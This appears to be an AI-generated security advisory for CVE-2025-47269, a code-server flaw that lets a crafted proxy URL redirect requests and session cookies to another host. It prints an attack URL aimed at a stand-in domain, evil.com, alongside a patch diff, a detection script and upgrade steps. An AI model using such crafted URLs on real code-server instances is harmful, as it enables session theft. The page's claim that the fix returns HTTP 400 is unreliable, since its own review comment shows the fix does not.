CVE-2025-47269 Overview
CVE-2025-47269 is an Improper Proxy Request Validation vulnerability in code-server, the popular tool that runs VS Code on any machine and exposes it through a browser. Versions prior to 4.99.4 do not validate the port parameter of proxy requests, allowing attackers to redirect proxied traffic to arbitrary external domains. This vulnerability is classified under CWE-441 (Unintended Proxy or Intermediary).
Critical Impact
Attackers can craft malicious URLs that exfiltrate session tokens, leading to complete system compromise with the privileges of the user running code-server.
Affected Products
- code-server versions prior to 4.99.4
- Deployments with the built-in proxy feature enabled
- Instances accessible via web browser with proxy subpath functionality
Discovery Timeline
- 2025-05-09 - CVE-2025-47269 published to NVD
- 2025-05-12 - Last updated in NVD database
Technical Details for CVE-2025-47269
Vulnerability Analysis
This vulnerability resides in the proxy subpath handling mechanism of code-server. The application's proxy feature is designed to forward requests to local ports, enabling developers to access locally running services through their code-server instance. However, the implementation fails to validate that the port parameter contains only numeric values, allowing attackers to inject arbitrary domain references.
When a user clicks a maliciously crafted URL such as https://<code-server>/proxy/test@evil.com/path, the port segment test@evil.com is concatenated into the target URL, producing http://0.0.0.0:test@evil.com/path. A URL parser reads 0.0.0.0:test as user credentials and evil.com as the host, so the request is proxied to the attacker-controlled domain. Since cookies are included in proxied requests, this allows the attacker to capture the user's session token.
Root Cause
The root cause lies in the path proxy route handler within src/node/routes/pathProxy.ts. The vulnerable code directly concatenates the req.params.port parameter into the proxy URL without proper validation or parsing. The parameter was expected to be a numeric port value but accepted arbitrary strings, enabling URL manipulation attacks.
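To make the concatenation concrete, the following is an added example (not code-server's own source) that models the vulnerable URL construction described above beside a strict replacement and asks Node's URL parser which host each built URL actually targets. The function names are assumed.

```typescript
// Added example, not code-server's own source: models the URL construction
// the advisory describes and a strict replacement. Function names are assumed.

// Pre-4.99.4 behaviour: the port segment is interpolated into the URL as-is.
function buildProxyUrlVulnerable(portParam: string, rest: string): string {
  return `http://0.0.0.0:${portParam}/${rest}`
}

// Strict variant: only a 1-5 digit string in 1..65535 is accepted; anything
// else is rejected (code-server's handler answers HTTP 400 at this point).
function buildProxyUrlFixed(portParam: string, rest: string): string {
  if (!/^\d{1,5}$/.test(portParam)) throw new Error("Invalid port")
  const port = Number(portParam)
  if (port < 1 || port > 65535) throw new Error("Invalid port")
  return `http://0.0.0.0:${port}/${rest}`
}

// Ask the WHATWG URL parser (Node's global URL) which host a built URL targets.
function effectiveHost(url: string): string {
  return new URL(url).hostname
}

// Constructed inputs: a legitimate local port and the crafted value from the advisory.
const legitTarget = buildProxyUrlVulnerable("3000", "api/status")
const craftedTarget = buildProxyUrlVulnerable("test@evil.com", "path")
console.log(effectiveHost(legitTarget))   // 0.0.0.0
console.log(effectiveHost(craftedTarget)) // evil.com: "0.0.0.0:test" became the userinfo
```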
Attack Vector
The attack exploits the network-accessible proxy functionality through user interaction. An attacker must convince a victim to click a malicious link pointing to their code-server instance. The attack flow is:
- Attacker crafts a URL with their domain embedded in the port parameter
- Victim clicks the malicious link while authenticated to code-server
- code-server proxies the request to the attacker's domain, including session cookies
- Attacker captures the session token and gains full access to the victim's code-server instance
): string => {
// If there is a base path, strip it out.
const base = (req as any).base || ""
- return `http://0.0.0.0:${req.params.port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}`
+ let port: number
+ try {
+ port = parseInt(req.params.port, 10)
+ } catch (err) {
+ throw new HttpError("Invalid port", HttpCode.BadRequest)
+ }
+ return `http://0.0.0.0:${port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}`
}
export async function proxy(
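Review bot: the try/catch around parseInt in this hunk is dead code, because parseInt never throws: a value such as test@evil.com yields NaN and the handler goes on to build http://0.0.0.0:NaN/... instead of returning the 400 the catch intends, and a value such as 80@evil.com is silently accepted as port 80 because parseInt stops at the first non-digit. The change does close the redirect, since a number or NaN can no longer carry a hostname, but the intended error path should be explicit, e.g. `const port = parseInt(req.params.port, 10)` followed by `if (Number.isNaN(port) || String(port) !== req.params.port) throw new HttpError("Invalid port", HttpCode.BadRequest)`, or a `/^\d+$/` test on the raw parameter before parsing.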
Source: GitHub Commit Update
Detection Methods for CVE-2025-47269
Indicators of Compromise
- Outbound connections from code-server instances to unexpected external domains
- Proxy requests with non-numeric port parameters containing @ symbols or domain names
- Session token usage from IP addresses inconsistent with legitimate user activity
- Unusual access patterns following proxy requests to external domains
Detection Strategies
- Implement web application firewall rules to detect proxy requests with malformed port parameters
- Monitor code-server access logs for /proxy/ paths containing non-numeric characters
- Alert on session authentications from new geographic locations or IP addresses
- Review HTTP referrer headers for suspicious external domain references in proxy requests
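As an added example of the log-monitoring strategy above (not part of the advisory or of code-server), the following scans access-log entries for /proxy/<port>/ paths, and code-server's /absproxy/<port>/ variant of the same route, whose port segment is not a plain port number; it decodes percent-encoding first so an encoded @ is not missed. The log lines are constructed and the common-log-format layout is an assumption.

```typescript
// Added example, not part of the advisory or of code-server: scans access-log
// entries for /proxy/<port>/ (and code-server's /absproxy/<port>/ variant) where
// the port segment is not a plain port number. Log lines are constructed and the
// layout (request line in quotes, common log format) is an assumption.

interface Finding { line: number; segment: string; reason: string }

const PROXY_PATH = /^\/(?:abs)?proxy\/([^/?#]+)/

// Returns null when the path is not a proxy route or its port segment is clean.
function proxySegmentProblem(path: string): { segment: string; reason: string } | null {
  const m = PROXY_PATH.exec(path)
  if (!m) return null
  const segment = m[1]
  // Express decodes route params, so %40 reaches the handler as '@': decode
  // before judging so a percent-encoded value is not missed.
  let decoded: string
  try { decoded = decodeURIComponent(segment) } catch { return { segment, reason: "undecodable port segment" } }
  if (decoded.includes("@")) return { segment, reason: "userinfo separator in port segment" }
  if (!/^\d{1,5}$/.test(decoded)) return { segment, reason: "non-numeric port segment" }
  const port = Number(decoded)
  if (port < 1 || port > 65535) return { segment, reason: "port out of range" }
  return null
}

function scanAccessLog(log: string): Finding[] {
  const findings: Finding[] = []
  log.split("\n").forEach((entry, i) => {
    const req = /"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) ([^ "]+)/.exec(entry)
    if (!req) return
    const problem = proxySegmentProblem(req[1])
    if (problem) findings.push({ line: i + 1, ...problem })
  })
  return findings
}

// Constructed sample log: one benign proxy request, the advisory's crafted
// path, its percent-encoded form, a benign absproxy request and a non-proxy hit.
const SAMPLE_LOG = [
  '10.0.0.5 - - [12/May/2025:10:01:02 +0000] "GET /proxy/3000/api/status HTTP/1.1" 200 512',
  '10.0.0.5 - - [12/May/2025:10:01:09 +0000] "GET /proxy/test@evil.com/path HTTP/1.1" 200 0',
  '10.0.0.7 - - [12/May/2025:10:02:15 +0000] "GET /proxy/test%40evil.com/path HTTP/1.1" 200 0',
  '10.0.0.9 - - [12/May/2025:10:03:44 +0000] "GET /absproxy/8080/ HTTP/1.1" 200 2048',
  '10.0.0.9 - - [12/May/2025:10:04:00 +0000] "GET /login HTTP/1.1" 200 1024',
].join("\n")

console.log(scanAccessLog(SAMPLE_LOG)) // flags lines 2 and 3
```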
Monitoring Recommendations
- Enable verbose logging for the proxy subpath functionality in code-server
- Configure network monitoring to track outbound connections from code-server host systems
- Implement anomaly detection for session token usage patterns
- Set up alerts for authentication events following proxy route access
How to Mitigate CVE-2025-47269
Immediate Actions Required
- Upgrade code-server to version 4.99.4 or later immediately
- Review access logs for any signs of exploitation prior to patching
- Rotate session tokens for all users as a precautionary measure
- Consider temporarily disabling the proxy feature if immediate upgrade is not possible
Patch Information
The vulnerability has been addressed in code-server version 4.99.4. The fix implements proper integer parsing for the port parameter, rejecting any non-numeric values with an HTTP 400 Bad Request error. Organizations should update their code-server installations immediately.
For detailed patch information, refer to the GitHub Security Advisory GHSA-p483-wpfp-42cj and the official release v4.99.4.
Workarounds
- Disable the built-in proxy feature if not required for operations
- Implement network-level restrictions to prevent code-server from making outbound connections to arbitrary domains
- Use a reverse proxy with strict URL validation rules in front of code-server
- Educate users about the risks of clicking untrusted links to code-server instances
# Upgrade example (run on the code-server host)
# Update code-server to the patched version via npm (install -g is the npm route code-server documents)
npm install -g code-server@4.99.4
# Or using the standalone installer
curl -fsSL https://code-server.dev/install.sh | sh -s -- --version=4.99.4
# Verify the installed version reports 4.99.4 or later
code-server --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.